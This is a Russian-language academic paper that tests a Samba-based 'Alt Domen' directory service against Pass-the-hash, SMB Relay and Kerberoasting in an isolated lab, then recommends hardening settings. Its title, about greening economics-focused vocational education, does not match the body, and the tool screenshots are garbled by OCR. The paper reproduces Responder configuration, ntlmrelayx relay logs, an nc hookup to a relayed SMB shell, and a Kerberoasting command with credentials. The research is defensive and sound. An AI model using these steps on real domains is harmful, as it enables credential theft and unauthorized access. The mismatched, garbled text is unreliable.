Экологизация среднего профессионального образования экономического профиля: опыт, проблемы и перспективы

Проблема обеспечения информационной безопасности в условиях стремительного роста киберугроз и цифровой трансформации организаций приобретает первостепенное значение. В последние годы на фоне политики импортозамещения особую актуальность приобретают отечественные решения, способные заменить зарубежные продукты корпоративного класса. Одним из таких решений является "Альт Домен" ‒ комплексное программное обеспечение для построения доменной инфраструктуры, основанной на ОС семейства Альт и сервере каталогов Samba. Его внедрение позволяет обеспечить централизованное управление учетными записями, политиками доступа, средствами аутентификации и авторизации.

В то же время, несмотря на наличие встроенных механизмов безопасности, доменная инфраструктура остаётся потенциальной целью для различных атак. Среди наиболее распространённых методов атак на такие системы можно выделить: повторное использование хэшей паролей (Pass-the-hash), ретрансляцию аутентификационных данных (SMB Relay) и получение сервисных билетов Kerberos с целью их взлома (Kerberoasting). Эти атаки позволяют злоумышленнику получить доступ к ресурсам без знания действительных паролей, что делает их особенно опасными в условиях неправильно сконфигурированной инфраструктуры.

В данной работе рассматриваются как теоретические аспекты построения защищённой доменной инфраструктуры на базе Альт Домен, так и практическое моделирование атак, а также разработка защитных мероприятий. Целью данной работы является комплексный анализ защищенности Альт Домен и разработка практических рекомендаций по обеспечению безопасности доменной инфраструктуры.

Объектом исследования является программный комплекс «Альт Домен», разработанный компанией «Базальт СПО» на основе Samba, предназначенный для централизованного управления гетерогенными корпоративными сетями, включающими системы на базе Windows и Linux. Предмет исследования ‒ защищенность «Альт Домен» от известных атак, включая SMB Relay, Pass-the-hash и Kerberoasting

ЛИТЕРАТУРНЫЙ ОБЗОР

Современная научная и прикладная литература уделяет значительное внимание вопросам защиты информационных систем, включая безопасность доменной инфраструктуры. Основной упор в исследованиях традиционно делается на платформу Microsoft Active Directory. Так, например, в публикации Скоропупова И. О., Бубновой А. А. и Карманова И. Н. [9] рассматриваются методы реализации атак на доменные инфраструктуры на базе семейства Windows. Авторы на конкретных примерах демонстрируют сценарии получения прав администратора домена через эксплуатацию уязвимостей в аутентификационных протоколах и ошибках конфигурации. Эти материалы служат ценным источником при анализе рисков, связанных с эксплуатацией даже современных решений

Однако в последние годы, в свете государственной политики импортозамещения, наблюдается рост интереса к отечественным решениям. Одним из таких решений является "Альт Домен", основанный на ОС Альт и службе каталогов Samba.

В работе Романенко О. В. и Осяевой А. А. [7] подчёркивается, что переход на ОС Альт в рамках миграции доменной инфраструктуры представляет собой логичный и обоснованный шаг в условиях отказа от проприетарного ПО. Авторы анализируют возможности интеграции сервисов аутентификации и управления доступом, а также описывают практические аспекты развёртывания домена на базе Альт. Особое внимание в исследовании уделено вопросу обеспечения совместимости и безопасности, включая настройку Kerberos и LDAP-сервисов, а также реализацию механизмов централизованной авторизации.

Таким образом, проведённый литературный анализ подтверждает актуальность темы исследования и демонстрирует необходимость разработки и апробации практических мер по обеспечению защищённости доменной среды на базе Альт Домен.

МЕТОДЫ ИССЛЕДОВАНИЯ

Методология данного исследования основана на практическом моделировании атак в тестовой среде, построенной с использованием компонентов Альт Домен, Samba 4 и Kali Linux. В ходе работы был развёрнут отдельный домен с контроллером, созданным на базе ОС Альт Сервер 10, в котором были задействованы основные службы: Kerberos, LDAP, DNS, а также политики безопасности.

«Альт Домен» ‒ служба каталогов (доменная служба), позволяющая централизованно управлять компьютерами и пользователями в корпоративной сети с операционными системами (ОС) на ядре Linux и Windows по единым правилам из единого центра. В системе реализовано хранение данных о пользователях, компьютерах (рабочих станциях) и других объектах корпоративной сети, а также управление профилями пользователей и компьютеров с помощью групповых политик в доменах MS Active Directory и Samba DC [3]. Альт Домен представляет широкие функциональные возможности:

• -    управление смешанной (гетерогенной) ИТ-инфраструктурой

• -    администрирование компьютеров с ОС «Альт», в домене Windows с помощью инструментов, аналогичных инструментам Microsoft, поддержка схем домена 2012, 2012R2, 2016, 2019,

• -    постепенный переход с MS Active Directory на «Альт Домен» без потери работоспособности ИТ-инфраструктуры,

• -    обеспечение отказоустойчивости ИТ-инфраструктуры (репликации между контроллерами доменов),

• -    объединение компьютеров в группы для централизованного администрирования по единым правилам,

• -    управление правами пользователей в группах,

• -    создание шаблонов групповых политик,

• -    настройка интервала времени повторного применения групповой политики,

• -    единая точка аутентификации (технология единого входа, SSO),

• -    дистанционная установка и регулярное обновление программного обеспечения на всех компьютерах группы,

• -    интеграция сервисов и оборудования,

• -    управление файлами и папками,

• -    отображение на рабочем столе ссылок на доступные сетевые диски,

• -    настройка внешнего вида рабочего стола пользователя,

• -    управление браузерами (Firefox, Яндекс Браузер и др.) через все возможные для этих браузеров политики.

На клиентских и атакующих машинах были установлены необходимые инструменты тестирования: Impacket (GetUserSPNs.py, ntlmrelayx.py, secretsdump.py), Responder, а также вспомогательные утилиты nmap, smbclient и krb5-user. Тестирование проводилось в изолированной виртуальной сети с контролируемыми условиями, что позволило безопасно воспроизвести сценарии реальных атак.

В рамках практической части работы была смоделирована атака Pass-the-hash в среде, полностью построенной на базе свободного программного обеспечения. Целью моделирования являлась проверка возможности использования хэшей паролей для получения доступа к доменным ресурсам без знания реального пароля пользователя. В процессе атаки предполагалась следующая последовательность: получение NTLM-хэша учетной записи домена, использование данного хэша для аутентификации на сервере и выполнение удалённых команд с привилегиями пользователя, чей хэш был скомпрометирован.

На первом этапе была подготовлена целевая учетная запись в домене — это может быть, как стандартная пользовательская запись, так и запись с расширенными привилегиями (например, член группы "Администраторы домена"). В контексте смоделированной атаки предполагалось, что хэш учетной записи уже доступен злоумышленнику, как это могло бы произойти в результате других атак — например, извлечения данных из локальной системы.

На втором этапе осуществлялась непосредственная попытка аутентификации с использованием ранее полученного NTLM-хэша. В ходе выполнения атаки атакующая система установила соединение с сервером в домене, указав в качестве пароля хэш NTLM, что является сутью атаки Pass-the-hash. Протокол NTLM, по своей природе, не требует знания оригинального пароля: он полагается на криптографическое сравнение хэшей, и, следовательно, при корректной реализации запроса принимает предоставленный хэш как действительные учетные данные.

г—(user® bosat)-[~]

Type help for list of commands

# use admindir

# Is

drw-rw-rw-           0 Sun May 18 21:19:00 2025 .

drw-rw-rw-           0 Sun May 18 21:19:00 2025 ..

-rw-rw-rw-          5 Sun May 18 21:19:00 2025 flag

# cat flag

BOO!

« I

Рисунок 1 ‒ Атака Pass-the-hash

После успешного прохождения аутентификации атакующая сторона получила возможность выполнять команды на удаленной машине в контексте скомпрометированной учетной записи. В тестовой инфраструктуре это сопровождалось подключением к общей сетевой папке, доступной только участникам группы "Администраторы домена". Фактически, с точки зрения целевого сервера, сессия выглядела как нормальное подключение пользователя из домена, прошедшего проверку подлинности.

[-] SMB SessionError: code: 0xC0000418 - STATUS_NTLM_BLOCKED - The authentica tion failed because NTLM was blocked.

Рисунок 2 ‒ Попытка атаки Pass-the-hash после применения защитных мер

Если использовать NTLM необходимо, то следует исключить хранение или передачу необработанных хэшей. В домене нужно настроить политику, запрещающую хранение LM-хэша и минимизирующую использование NTLM, а также не использовать NTLM v1. Также следует использовать многофакторную аутентификацию для доступа к особым ресурсам, а все сервисные и администраторские учётные записи должны иметь уникальные, сложные пароли, которые меняются регулярно.

SMB Relay представляет собой классическую атаку типа «Человек посередине» (Man-in-the-Middle), в рамках которой злоумышленник, расположенный в одной сети с жертвой, перехватывает попытку аутентификации клиента на определённый сетевой ресурс и ретранслирует её на целевой сервер от своего имени. В случае, если сервер не применяет защитные механизмы, такие как обязательная цифровая подпись SMB, происходит успешная аутентификация злоумышленника с использованием легитимных учетных данных жертвы.

Первоначально была проверена конфигурация целевого сервера. Одним из ключевых условий успешной атаки SMB Relay является отключённая обязательная подпись SMB (SMB signing). На Альт Домен этот параметр включен по умолчанию, соответствующий параметр в конфигурации был изменён, что позволило проводить ретрансляцию NTLM-сообщений без прерывания соединения.

Server signing = disabled

Просканировав сеть утилитой nmap, получим следующее сообщение, которое говорит о том, что можно провести атаку.

Host script results:

I smb2-security-mode:

I 3:1:1:

l_ Message signing enabled but not required

Рисунок 3 ‒ Сканирование сети

Кроме того, чтобы инициировать подключение жертвы к атакующему хосту, использовался простой механизм — доступ к сетевому ресурсу вида \\ attacker_ip\share , инициированный с клиентской машины, также находящейся в домене и работающей под управлением ОС Альт. Подобный доступ может быть спровоцирован, например, через запуск скрипта, переход по ссылке в почтовом сообщении или автоматическую загрузку внешнего ресурса в документах (например, LibreOffice или PDF).

- # smbclient //10.0.2.16/share -U WORK. ALTWivanov

Рисунок 4 ‒ Моделирование подключения жертвы

В атаке используются утилиты Responder и ntlmrelayx.py, входящий в состав Impacket. Во-первых, необходимо правильно настроить Responder для отключения SMB и HTTP-ответов, поскольку они будут пересылаться в ntlmrelayx, и в конечном итоге ретранслироваться. Для этого необходимо изменить строки в файле /etc/responder/Responder.conf:

SMB = Off

HTTP = Off

После этого запустим Responder:

-(user 7 bosat)-[~/impacket/impacket/examples]

5 sudo responder -I ethl

.-------.--------.--------.--------.--------.--------.—I -------------------

I    _l   - I    —I   _ I   _ I        I _   II -_l _l l_l

To support this project:

Github -»

Paypal -»

To kill this script hit CTRL-C

[+] Poisoners:

LLMNR[ON]

NBT-NS[ON]

MDNS[ON]

DNS[ON]

DHCP

[+] Servers: HTTP server HTTPS server[ON]

WPAD proxy

Auth proxy SMB server Kerberos server[ON]

SQL server[ON]

FTP server[ON]

Рисунок 5 ‒ Прослушивание входящих подключений

После запуска утилиты ntlmrelayx.py атакующая машина начала слушать входящие подключения на портах SMB (445 TCP) и HTTP (80 TCP). Как только жертва инициировала запрос к атакующему узлу, ее система отправила NTLM-запрос на аутентификацию, который был перехвачен и немедленно ретранслирован к серверу домена.

г—-(user ■•bosat)-[~/impacket/impacket/examples]

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Protocol Client IMAP loaded ..

[*] Protocol Client IMAPS loaded ..

[*] Protocol Client SMTP loaded ..

[*] Protocol Client MSSQL loaded ..

[*] Protocol Client RPC loaded..

[*] Protocol Client SMB loaded..

[*] Protocol Client LDAPS loaded ..

[ ★ ] Protocol Client LDAP loaded ..

[*] Protocol Client DCSYNC loaded..

[ ★ ] Protocol Client HTTP loaded ..

[*] Protocol Client HTTPS loaded ..

[*] Running in relay mode to single host

[*] Setting up SMB Server on port445

[*] Setting up HTTP Server on port 80

[*] Setting up WCF Server on port9389

[*] Setting up RAW Server on port6666

[*] Multirelay disabled

[*] Servers started, waiting for connections

[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.0.2.17, attacking target smb://10.0.2.15

[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000

Рисунок 6 ‒ Ретрансляция запроса

После установления сессии атакующий получил возможность выполнять действия от имени жертвы:

I—(user®bosat )-[~/impacket/impacket/examples] I—$ nc 127.0.0.1 11000

Type help for list of commands в shares sysvol netlogon IPC$ "  # I

Рисунок 7 ‒ Подключение к целевому ресурсу

«Альт Домен» изначально спроектирован с учетом требований безопасности: ОС «Альт СП» сертифицирована ФСТЭК и реализует российские криптографические стандарты. Сервер с развернутым «Альт Домен» поддерживает протоколы SMB2/SMB3 с шифрованием трафика, и по умолчанию использует проверку подлинности ‒ SMB-подпись, для защиты от перехвата

server signing = mandatory client signing = mandatory restrict anonymous = 2

disable netbios = yes smb ports = 445

ntlm auth = mschapv2-and-ntlmv2-only

Параметр restrict anonymous = 2 ограничивает анонимный доступ к контроллеру. Отключение NetBIOS и использование исключительно порта 445 обеспечивает работу только по современным протоколам. Отключение NTLMv1 исключает уязвимые подключения. При использовании этих мер, провести атаку станет невозможно:

[-] SMB SessionError: code: 0*c0000022 - STATUS„ACCESS^DENIED - {Access Denied} A process has requested access to an objec t but has not been granted those access rights.

Рисунок 8 ‒ Демонстрация мер защиты

Для облегчения проведения атаки Kerberoasting были вручную настроены SPN-записи на одной из сервисных учётных записей, имитирующей типичную инфраструктуру с SQL-сервером, и были ослаблены криптографические настройки в файле конфигурации smb.conf , разрешив использование слабого алгоритма RC4. На атакующей машине под управлением Kali Linux был установлен и настроен инструмент GetUserSPNs.py из набора Impacket, реализующий механизм запроса SPN и извлечения сервисных билетов.

Атака запускалась из командной строки Kali Linux, после успешной аутентификации пользователя в домене. Запрос был направлен на получение билетов сервисных учётных записей с SPN. Инструмент корректно обнаружил наличие сервиса и сформировал TGS-запрос к контроллеру домена.

г—(user > bosat)-[-/impacket]

• ■—S python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py WORK. ALT/ testadmin:testP3ssw0rd -dc-ip 10.0.2.15 -request

  Impacket v0.13.0.dev0+20250523.184829.f2f2b367 - Copyright Fortra, LLC and it s affiliated companies

ServicePrincipalName              Name MemberOf PasswordLastSet

LastLogon Delegation

72

Рисунок 9 ‒ Поиск активных SPN

Однако при попытке обработки ответа с билетом возникла ошибка Kerberos уровня: KRB_AP_ERR_INAPP_CKSUM, связанная с несовпадением типа подсчета контрольных сумм.

[ + ] Trying to connect to KDC at 10.0.2.15:88

[+] Server time (UTC): 2025-05-31 23:36:26

[+1 Server time (UTC): 2025-05-31 23:36:25

[+] Exception:

Traceback (most recent call last):

TGT['KDC_REP'], TGT['cipher'],

АААААААААЛААЛЛАЛААЛАААААААЛААА

TGT[’sessionKey'])

ЛАЛЛЛАААЛЛЛАЛЛЛЛЛЛ

Рисунок 10 ‒ Ошибка при проведении атаки

Ошибка указывает на то, что сгенерированный билет не может быть расшифрован или проверен из-за нарушения алгоритмической совместимости между клиентом и сервером. Несмотря на то, что были разрешены алгоритмы

RC4 и отключены современные типы шифрования (AES), Альт Домен в роли KDC продолжал применять криптографические механизмы, несовместимые с теми, которые ожидает утилита Impacket.

Следует отметить, что в отличие от классического Active Directory, Samba в качестве KDC имеет ограниченную поддержку алгоритмов и зачастую не реплицирует поведение Windows по умолчанию. Даже при наличии SPN и ослабленных политик, реализация протокола Kerberos на базе Samba может по-прежнему использовать алгоритмы и структуры пакетов, несовместимые с утилитами, рассчитанными на работу с Microsoft KDC. При всем этом протокол Kerberos работал без ошибок во взаимодействии с легитимными пользователями ‒ выдача билетов, введение машин в домен осуществлялись успешно.

Защита от Kerberoasting включает в себя следующие настройки ‒ в /var/lib/samba/private/krb5.conf или /etc/krb5.conf следует явно указать сильные алгоритмы шифрования – например, только AES-256/128 (и/или ГОСТ 28147) для ключей билетов Kerberos. Также необходимо запретить поддержку устаревших RC4/DES. Для критических сервисных аккаунтов необходимо снять флаги TrustedForDelegation и TrustedToAuthForDelegation. Учетные записи администраторов домена следует добавлять в группу Protected Users – это снимет использование NTLM/RC4 и запретит делегирование. Кроме того, не следует назначать лишние SPN (Service Principal Name) ненадежным учетным записям.

РЕЗУЛЬТАТЫ ИССЛЕДОВАНИЯ

В рамках данной работы была проведена теоретическая и практическая оценка безопасности доменной инфраструктуры, построенной на базе решения «Альт Домен». Основной задачей исследования являлась имитация наиболее распространённых атак на службы аутентификации и сетевые протоколы (в частности, Pass-the-hash, SMB Relay и Kerberoasting), а также анализ эффективности встроенных и настраиваемых механизмов защиты в «Альт Домен» для противодействия подобным угрозам.

В ходе моделирования атак было установлено, что реализация домена на базе программно-аппаратного комплекса «Альт Домен» обеспечивает базовую защищённость за счёт ряда предустановленных параметров. В частности, по умолчанию в «Альт Домен» включена цифровая подпись SMB-соединений, реализована поддержка современных и отечественных криптографических алгоритмов, включая ГОСТ, а также предлагается использование механизма централизованных политик безопасности. Благодаря этим особенностям инфраструктура с «Альт Домен» уже на этапе развертывания имеет повышенный уровень устойчивости к распространённым атакам, нацеленных на перехват учетных данных, их повторное использование или подмену соединений.

Во время практической части работы удалось успешно провести атаку SMB Relay при отключении подписи SMB на целевой машине, что подтвердило уязвимость при нарушении рекомендуемой конфигурации. Моделирование атаки Pass-the-hash также увенчалось успехом при наличии захваченного хэша NTLM, что в очередной раз подчеркивает важность управления учетными записями и минимизации привилегий. Атака Kerberoasting не дала ожидаемых результатов из-за сбоев, связанных с криптографической несовместимостью, что, в свою очередь, демонстрирует защитную роль современных шифровальных алгоритмов и ограничений в реализации Kerberos на стороне контроллера домена.

ЗАКЛЮЧЕНИЕ

В работе были рассмотрены практические рекомендации по защите доменной инфраструктуры на базе «Альт Домен»: включение обязательной подписи и шифрования SMB-соединений, применение современных алгоритмов Kerberos, ограничение делегирования, отказ от устаревших схем аутентификации, настройка групповых политик и использование встроенных групп безопасности. Все предложенные меры могут быть реализованы средствами самой платформы без необходимости привлечения сторонних решений.

Таким образом, «Альт Домен» является конкурентной альтернативой для построения защищённой доменной инфраструктуры в организациях, предъявляющих высокие требования к информационной безопасности. Использование отечественных стандартов шифрования, сертифицированных ОС, гибких политик доступа и совместимости с AD-протоколами делает эту платформу особенно актуальной в условиях импортозамещения и повышенного внимания к вопросам защиты информационных систем.

Проведённый анализ и практическое моделирование подтверждают, что при корректной настройке и соблюдении рекомендаций «Альт Домен» способен эффективно противостоять целому ряду распространённых атак, сохраняя стабильность и совместимость с привычными для администраторов методами управления корпоративной сетью.